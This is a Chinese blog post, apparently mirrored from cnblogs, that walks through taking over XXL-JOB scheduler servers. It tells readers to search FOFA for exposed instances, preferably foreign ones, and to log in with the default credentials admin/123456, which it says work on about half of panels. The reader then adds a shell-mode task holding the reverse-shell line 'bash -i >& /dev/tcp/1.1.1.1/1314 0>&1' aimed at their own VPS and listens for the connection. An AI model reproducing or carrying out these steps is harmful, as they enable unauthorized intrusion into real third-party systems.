zoukankan      html  css  js  c++  java
  • XXL-JOB反弹shell

    ————背景说明————

    XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。其后台可以通过添加新的任务并写入反弹shell的bash语句进行执行。官方好像觉得这是他们提供的一个功能点,不算是漏洞和设计疏忽,所以它目前还是广泛存在的。我在一次演练的时候遇到,简单地测试了一下发现没有成功,初步判断是不能出网,回来找了几台目标做了测试验证。

    ————实验过程————

    首先在fofa上找个目标,输入相关特征查找,最好选择境外的站。

     

    目前我觉得,使用该攻击有两个前提,一是目标机子能够出网,二是该攻击需要进入到管理后台操作。

    进入这个后台方法大多是打弱口令打一遍,其弱口令为admin/123456。不知道是因为管理员觉得调度平台没什么功能点还是啥,反正默认的账户密码大多没改,基本在fofa上面搜索十个后台能命中一半左右。

    接下来就是直接操作了

    选任务管理,然后右上角新增新增一个任务,在运行模式选中shell方式

    其他的随便配配,不是很重要

    接下来新增好了后,进入该任务的GLUE面板

    然后写个反弹shell的指令

    bash -i >& /dev/tcp/1.1.1.1/1314 0>&1

     1.1.1.1写自己公网vps

    写完保存后在公网vps开启监听

     在管理面板选中任务,执行一次

     反弹getshell

     ————结束撒花————

  • 相关阅读:
    关于json前后台传值
    [LeetCode] #29 Divide Two Integers
    [LeetCode] #28 Implement strStr()
    [LeetCode] #27 Remove Element
    [LeetCode] #26 Remove Duplicates from Sorted Array
    [LeetCode] #25 Reverse Nodes in k-Group
    [LeetCode] #24 Swap Nodes in Pairs
    [LeetCode] #23 Merge k Sorted Lists
    [LeetCode] #22 Generate Parentheses
    [LeetCode] #21 Merge Two Sorted Lists
  • 原文地址:https://www.cnblogs.com/hguone/p/14324417.html
Copyright © 2011-2022 走看看